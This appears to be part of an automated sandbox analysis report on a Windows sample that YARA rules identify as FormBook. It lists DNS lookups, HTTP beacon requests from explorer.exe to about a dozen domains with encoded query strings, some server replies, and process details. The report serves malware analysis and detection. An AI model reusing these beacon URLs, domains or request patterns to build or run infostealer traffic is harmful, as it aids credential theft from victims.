                                                                                                                        Feb 23, 2021 09:20:11.279791117 CET5680353192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:20:11.329194069 CET53568038.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:20:12.565169096 CET5714553192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:20:12.633227110 CET53571458.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:20:13.065254927 CET5535953192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:20:13.134967089 CET53553598.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:20:18.331641912 CET5830653192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:20:18.397118092 CET53583068.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:20:23.407660961 CET6412453192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:20:23.471493006 CET53641248.8.8.8192.168.2.3
                                                                                                                        Feb 23, 2021 09:20:28.672559023 CET4936153192.168.2.38.8.8.8
                                                                                                                        Feb 23, 2021 09:20:28.746814013 CET53493618.8.8.8192.168.2.3

                                                                                                                        DNS Queries

                                                                                                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                                                                                        Feb 23, 2021 09:19:17.523621082 CET | 192.168.2.3 | 8.8.8.8 | 0x4959 | Standard query (0) | www.pcareinc.com | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:23.433437109 CET | 192.168.2.3 | 8.8.8.8 | 0xed74 | Standard query (0) | www.antips.com | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:29.580148935 CET | 192.168.2.3 | 8.8.8.8 | 0xe6cd | Standard query (0) | www.edgewooddhr.net | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:35.511317968 CET | 192.168.2.3 | 8.8.8.8 | 0x2f8d | Standard query (0) | www.ndk168.com | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:41.169655085 CET | 192.168.2.3 | 8.8.8.8 | 0x1787 | Standard query (0) | www.inbarrel.com | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:46.435403109 CET | 192.168.2.3 | 8.8.8.8 | 0xd783 | Standard query (0) | www.39palmavenue.com | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:51.971105099 CET | 192.168.2.3 | 8.8.8.8 | 0xa93c | Standard query (0) | www.buildassetswealth.com | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:57.238603115 CET | 192.168.2.3 | 8.8.8.8 | 0x7ccb | Standard query (0) | www.beconfidentagain.com | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:02.453564882 CET | 192.168.2.3 | 8.8.8.8 | 0x5690 | Standard query (0) | www.torontotel.com | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:07.589055061 CET | 192.168.2.3 | 8.8.8.8 | 0xc4d3 | Standard query (0) | www.rehabcareconnect.com | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:13.065254927 CET | 192.168.2.3 | 8.8.8.8 | 0x9ea2 | Standard query (0) | www.speedysnacksbox.com | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:18.331641912 CET | 192.168.2.3 | 8.8.8.8 | 0xa7f5 | Standard query (0) | www.thepixxelgroup.com | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:23.407660961 CET | 192.168.2.3 | 8.8.8.8 | 0xf8a1 | Standard query (0) | www.havemercyinc.net | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:28.672559023 CET | 192.168.2.3 | 8.8.8.8 | 0xf459 | Standard query (0) | www.larek.store | A (IP address) | IN (0x0001)

                                                                                                                        DNS Answers

                                                                                                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                                                                        Feb 23, 2021 09:19:17.702505112 CET | 8.8.8.8 | 192.168.2.3 | 0x4959 | No error (0) | www.pcareinc.com | | 154.213.108.250 | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:23.587986946 CET | 8.8.8.8 | 192.168.2.3 | 0xed74 | No error (0) | www.antips.com | HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:23.587986946 CET | 8.8.8.8 | 192.168.2.3 | 0xed74 | No error (0) | HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | | 3.223.115.185 | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:29.757343054 CET | 8.8.8.8 | 192.168.2.3 | 0xe6cd | No error (0) | www.edgewooddhr.net | | 208.91.197.27 | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:35.724052906 CET | 8.8.8.8 | 192.168.2.3 | 0x2f8d | No error (0) | www.ndk168.com | | 23.224.206.45 | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:41.233515024 CET | 8.8.8.8 | 192.168.2.3 | 0x1787 | No error (0) | www.inbarrel.com | inbarrel.com | | CNAME (Canonical name) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:41.233515024 CET | 8.8.8.8 | 192.168.2.3 | 0x1787 | No error (0) | inbarrel.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:46.513928890 CET | 8.8.8.8 | 192.168.2.3 | 0xd783 | No error (0) | www.39palmavenue.com | sslplaform.bostonlogic.com | | CNAME (Canonical name) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:46.513928890 CET | 8.8.8.8 | 192.168.2.3 | 0xd783 | No error (0) | sslplaform.bostonlogic.com | sequoia.bostonlogic.com | | CNAME (Canonical name) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:46.513928890 CET | 8.8.8.8 | 192.168.2.3 | 0xd783 | No error (0) | sequoia.bostonlogic.com | | 23.253.73.122 | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:52.033718109 CET | 8.8.8.8 | 192.168.2.3 | 0xa93c | No error (0) | www.buildassetswealth.com | buildassetswealth.com | | CNAME (Canonical name) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:52.033718109 CET | 8.8.8.8 | 192.168.2.3 | 0xa93c | No error (0) | buildassetswealth.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:57.298604012 CET | 8.8.8.8 | 192.168.2.3 | 0x7ccb | No error (0) | www.beconfidentagain.com | | 104.21.76.239 | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:19:57.298604012 CET | 8.8.8.8 | 192.168.2.3 | 0x7ccb | No error (0) | www.beconfidentagain.com | | 172.67.202.77 | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:02.551256895 CET | 8.8.8.8 | 192.168.2.3 | 0x5690 | Name error (3) | www.torontotel.com | none | none | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:07.752645969 CET | 8.8.8.8 | 192.168.2.3 | 0xc4d3 | No error (0) | www.rehabcareconnect.com | rehabcareconnect.com | | CNAME (Canonical name) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:07.752645969 CET | 8.8.8.8 | 192.168.2.3 | 0xc4d3 | No error (0) | rehabcareconnect.com | | 92.249.45.191 | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:13.134967089 CET | 8.8.8.8 | 192.168.2.3 | 0x9ea2 | No error (0) | www.speedysnacksbox.com | speedysnacksbox.com | | CNAME (Canonical name) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:13.134967089 CET | 8.8.8.8 | 192.168.2.3 | 0x9ea2 | No error (0) | speedysnacksbox.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:18.397118092 CET | 8.8.8.8 | 192.168.2.3 | 0xa7f5 | Name error (3) | www.thepixxelgroup.com | none | none | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:23.471493006 CET | 8.8.8.8 | 192.168.2.3 | 0xf8a1 | No error (0) | www.havemercyinc.net | havemercyinc.net | | CNAME (Canonical name) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:23.471493006 CET | 8.8.8.8 | 192.168.2.3 | 0xf8a1 | No error (0) | havemercyinc.net | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                                                                                                        Feb 23, 2021 09:20:28.746814013 CET | 8.8.8.8 | 192.168.2.3 | 0xf459 | No error (0) | www.larek.store | | 185.104.45.146 | A (IP address) | IN (0x0001)

                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • www.pcareinc.com
                                                                                                                        • www.antips.com
                                                                                                                        • www.edgewooddhr.net
                                                                                                                        • www.ndk168.com
                                                                                                                        • www.inbarrel.com
                                                                                                                        • www.39palmavenue.com
                                                                                                                        • www.buildassetswealth.com
                                                                                                                        • www.beconfidentagain.com
                                                                                                                        • www.rehabcareconnect.com
                                                                                                                        • www.speedysnacksbox.com
                                                                                                                        • www.havemercyinc.net

                                                                                                                        HTTP Packets

                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                        0 | 192.168.2.3 | 49713 | 154.213.108.250 | 80 | C:\Windows\explorer.exe
                                                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                                                        Feb 23, 2021 09:19:18.058295012 CET | 1018 | OUT | GET /4qdc/?sxlpdB=n05rnph+IqNz0mbSS5vp9sGjLY7dyqnysY607r4vHHjCLr3ziiRBE07QjlPjM5GqarqD&2dz=onbha HTTP/1.1
                                                                                                                        Host: www.pcareinc.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:


                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                        1 | 192.168.2.3 | 49715 | 3.223.115.185 | 80 | C:\Windows\explorer.exe
                                                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                                                        Feb 23, 2021 09:19:23.717447996 CET | 1021 | OUT | GET /4qdc/?sxlpdB=FDPsk0sff5Lw+z8Vw8rcgpm8MWqJfMs2bvH8+cW5/POI2TSyhlXdRmW8g+C2mzqgUbJY&2dz=onbha HTTP/1.1
                                                                                                                        Host: www.antips.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Feb 23, 2021 09:19:23.844760895 CET | 1026 | IN | HTTP/1.1 302 Found
                                                                                                                        Cache-Control: private
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Location: https://www.hugedomains.com/domain_profile.cfm?d=antips&e=com
                                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        Date: Tue, 23 Feb 2021 08:19:02 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 182
                                                                                                                        Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.hugedomains.com/domain_profile.cfm?d=antips&amp;e=com">here</a>.</h2></body></html>


                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                        10 | 192.168.2.3 | 49753 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                                                        Feb 23, 2021 09:20:23.514893055 CET | 6424 | OUT | GET /4qdc/?sxlpdB=o1YYd6Gi2K67gelLAX14ago2MHBzIaWFdtb1Ca8ijRLt6mEmIsAV47qF7pv8e7ASo7Rk&2dz=onbha HTTP/1.1
                                                                                                                        Host: www.havemercyinc.net
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Feb 23, 2021 09:20:23.654359102 CET | 6425 | IN | HTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Tue, 23 Feb 2021 08:20:23 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "603153c4-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49722 | 208.91.197.27 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 09:19:29.946145058 CET | 1250 | OUT | GET /4qdc/?sxlpdB=+7VgHCQQJYO0FHfoX4VwpMGRpMkf/fkwbCKrV3wMZoe5nkwvpaAzoW+aSblNd7Hd+wjC&2dz=onbha HTTP/1.1
                                                                                                                        Host: www.edgewooddhr.net
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
Feb 23, 2021 09:19:30.277334929 CET | 1282 | IN | HTTP/1.1 200 OK
                                                                                                                        Date: Tue, 23 Feb 2021 08:19:30 GMT
                                                                                                                        Server: Apache
                                                                                                                        Set-Cookie: vsid=918vr3616139700809367; expires=Sun, 22-Feb-2026 08:19:30 GMT; Max-Age=157680000; path=/; domain=www.edgewooddhr.net; HttpOnly
                                                                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_hYI5FgRivm97L0ZhxJZJHb6tu9340hOnvoCgyVNLxugqNGFCB7mbeB8pbBQwYrXBInZ2FL1RynS3GR30enIkxQ==
                                                                                                                        Keep-Alive: timeout=5, max=97
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Data Ascii: 4907<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_hYI5FgRivm97L0ZhxJZJHb6tu9340hOnvoCgyVNLxugqNGFCB7mbeB8pbBQwYrXBInZ2FL1RynS3GR30enIkxQ=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.edgewooddhr.net/px.js?ch=1"></script><script type="text/javascript" src="http://www.edgewooddhr.net/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.st
Feb 23, 2021 09:19:30.277365923 CET | 1283 | IN
                                                                                                                        Data Ascii: yle.width="0px";imglog.src="http://www.edgewooddhr.net/sk-logabpstatus.php?a=OGV6bW5PNHY5RDBLVDRlaE9pMHUwVmhuSE9saGtQT3piOEZiYkdMMzFLblNHQkt3U0VxU0pISE82Q1VhblNqKzczdkVMRkRzSlZlelNjZExpRzdMTUpEc3NkeTdHell1R20zQXEyVTRkRFU9&b="+abp;document.body
Feb 23, 2021 09:19:30.277400970 CET | 1284 | IN
                                                                                                                        Data Ascii: ts/open-sans/open-sans.otf") format("opentype"),url("http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans") format("svg");font-weight: normal;font-style: normal;}@font-face {font-family: "open-sans-bold";src: url("http://
Feb 23, 2021 09:19:30.354926109 CET | 1316 | IN
                                                                                                                        Data Ascii: background:#fff;font-weight: 400;background: url(http://i4.cdn-image.com/__media__/pics/27587/BG_2.png) no-repeat center bottom; background-size: cover;background-attachment: fixed;}.top-strip .main-container{width:1150px; margin:0 auto;p
Feb 23, 2021 09:19:30.439970970 CET | 1318 | IN
                                                                                                                        Data Ascii: auto;}.searchbox{float:right; width:400px; height:37px;}.srch-txt{float: left; width: 343px; height: 37px; padding:0 10px;font-size: 16px; background: #fff; color: #000; padding: 0 10px; outline: none; border: none}.srch-btn{float: righ
Feb 23, 2021 09:19:30.517585039 CET | 1327 | IN
                                                                                                                        Data Ascii: .kwd_bloack ul li a:hover{background-color:#0b8040;color: #fff}.sale-msg {background:#fff; color:#4b4b4b; text-align:center; font-size:14px; height:40px; width:100%; top:0; left:0}.sale-msg a {text-decoration: none; color:#079ce9; font-s
Feb 23, 2021 09:19:30.517618895 CET | 1328 | IN
                                                                                                                        Data Ascii: sform: none;} .msgright{width: 100%;text-align: center} .top-strip{margin-bottom: 40px} .logo-img-wrap{float:none;width:auto} .searchbox{margin:0; float:none; width:auto; padding:20px 5px} .kwd_bloack{float:none; wid
Feb 23, 2021 09:19:30.624599934 CET | 1331 | IN
                                                                                                                        Data Ascii: px} .msgright .expMsg, .backorder, .msgright .expMsg a{font-size: 12px} .related-searches-custom{font-size: 14px} }</style><script language="JavaScript" type="text/javascript" src="http://i4.cdn-image.com/__media__/js/min.js?v
Feb 23, 2021 09:19:30.624634981 CET | 1332 | IN
                                                                                                                        Data Ascii: edgewooddhr.net" onClick="return popup(this, 'notes')"> Why am I seeing this 'Under Construction' page?</a></p> <div class="expMsg"> </div> </div> </div> </div>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49735 | 23.224.206.45 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 09:19:35.940804005 CET | 1963 | OUT | GET /4qdc/?sxlpdB=fgRLe1wDsIR582SpVqHNrqc5X9FQKzC9eNMuu75MPd7YekjVZ2QEORs18XDbgwZ5UcjJ&2dz=onbha HTTP/1.1
                                                                                                                        Host: www.ndk168.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49740 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 09:19:41.279925108 CET | 2121 | OUT | GET /4qdc/?sxlpdB=DRpehdA/33BzcPgqXFJLC0P+7mKy3AC9kGgryjypn4W4a4lypWUQvIUJQnrelubfkLFp&2dz=onbha HTTP/1.1
                                                                                                                        Host: www.inbarrel.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
Feb 23, 2021 09:19:41.421806097 CET | 2121 | IN | HTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Tue, 23 Feb 2021 08:19:41 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "6031584e-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.3 | 49746 | 23.253.73.122 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 09:19:46.672395945 CET | 6395 | OUT | GET /4qdc/?sxlpdB=ZB8Pl5eBC7Hephg+P6iGhrGYsApNwIB7ekAHWQJEYqlC8jRN6CLcZFL5CLWpIktyGytq&2dz=onbha HTTP/1.1
                                                                                                                        Host: www.39palmavenue.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
Feb 23, 2021 09:19:46.848619938 CET | 6396 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                        Date: Tue, 23 Feb 2021 08:19:46 GMT
                                                                                                                        Server: Apache/2.4.18 (Ubuntu)
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        X-Request-Id: 192509b7-553e-4f5e-9363-f522e5c5a0f9
                                                                                                                        X-Runtime: 0.011706
                                                                                                                        X-Powered-By: Phusion Passenger Enterprise 6.0.1
                                                                                                                        Location: https://www.onesothebysrealty.com/39palmavenue
                                                                                                                        Status: 301 Moved Permanently
                                                                                                                        Connection: close
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        Data Ascii: 70<html><body>You are being <a href="https://www.onesothebysrealty.com/39palmavenue">redirected</a>.</body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.3 | 49747 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 09:19:52.076121092 CET | 6397 | OUT | GET /4qdc/?sxlpdB=t6rgzpThEavL/zg9991GCjSWOfv9/TODS4c0mNe7yolhiaEFU/O6K33zqhrleftTdvyE&2dz=onbha HTTP/1.1
                                                                                                                        Host: www.buildassetswealth.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
Feb 23, 2021 09:19:52.215910912 CET | 6397 | IN | HTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Tue, 23 Feb 2021 08:19:52 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "603155b9-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.3 | 49748 | 104.21.76.239 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 09:19:57.363087893 CET | 6399 | OUT | GET /4qdc/?sxlpdB=uT9syTVFNHzfIlw/vi0ORJwgGNlm67yR3EiChoWxlToAUfSEqT6/a/KF0zmtzwOHQ1u8&2dz=onbha HTTP/1.1
                                                                                                                        Host: www.beconfidentagain.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
Feb 23, 2021 09:19:57.433413982 CET | 6400 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                        Date: Tue, 23 Feb 2021 08:19:57 GMT
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Cache-Control: max-age=3600
                                                                                                                        Expires: Tue, 23 Feb 2021 09:19:57 GMT
                                                                                                                        Location: https://www.beconfidentagain.com/4qdc/?sxlpdB=uT9syTVFNHzfIlw/vi0ORJwgGNlm67yR3EiChoWxlToAUfSEqT6/a/KF0zmtzwOHQ1u8&2dz=onbha
                                                                                                                        cf-request-id: 086f924d5800000c651184c000000001
                                                                                                                        Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=uy2dIjQ0nCI30FyxF7TryTCFlKZVe6i0WOQUYmyQB9uCommyFeXKh9PYClp8t%2Bzcx%2BrmopSYRWNR%2BAcNz4w8TD1memlpcGTuMOdnYKOCCrh52FU7NMgfcaY%3D"}],"group":"cf-nel"}
                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 625f865bcee80c65-AMS
                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.3 | 49749 | 92.249.45.191 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 09:20:07.902918100 CET | 6401 | OUT | GET /4qdc/?sxlpdB=XrM9oEi9W6a6X8UVQlR+JUyFbINbZfC+p7wdaOxjToB4fXjiFd7gjA62KvYw0vzt+GJp&2dz=onbha HTTP/1.1
                                                                                                                        Host: www.rehabcareconnect.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
Feb 23, 2021 09:20:08.052963018 CET | 6403 | IN | HTTP/1.1 404 Not Found
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html
                                                                                                                        Last-Modified: Tue, 09 Jul 2019 06:18:14 GMT
                                                                                                                        Etag: "999-5d2431a6-2d9d76b743ab0996;;;"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 2457
                                                                                                                        Date: Tue, 23 Feb 2021 08:20:07 GMT
                                                                                                                        Server: LiteSpeed
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, some
                                                                                                                        Feb 23, 2021 09:20:08.052984953 CET | 6404 | IN | Data Raw: 74 68 69 6e 67 20 6c 6f 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 74 68 65 20 70 61 67 65
                                                                                                                        Data Ascii: thing lost</title> <meta name="description" content="Oops, looks like the page is lost. Start your website on the cheap."> <link media="all" rel="stylesheet" href="/htdocs_error/style.css"> <link rel="stylesheet" href="https://maxc
                                                                                                                        Feb 23, 2021 09:20:08.052998066 CET | 6404 | IN | Data Raw: 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: </div> </div></body></html>


                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                        9 | 192.168.2.3 | 49752 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                                                        Feb 23, 2021 09:20:13.180762053 CET | 6423 | OUT | GET /4qdc/?sxlpdB=oetlJbthpq9VCk3sxGtc819EDOSw/wKhNDSOaTnbk4bTW9QfHQR4t80kWNVKaJln9Y1c&2dz=onbha HTTP/1.1
                                                                                                                        Host: www.speedysnacksbox.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Feb 23, 2021 09:20:13.319900990 CET | 6423 | IN | HTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Tue, 23 Feb 2021 08:20:13 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "6031584e-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                        System Behavior

                                                                                                                        General

                                                                                                                        Start time:09:18:17
                                                                                                                        Start date:23/02/2021
                                                                                                                        Path:C:\Users\user\Desktop\lpdKSOB78u.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Users\user\Desktop\lpdKSOB78u.exe'
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:217653 bytes
                                                                                                                        MD5 hash:F10054D325DF455C58ECB16EA660D3F2
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
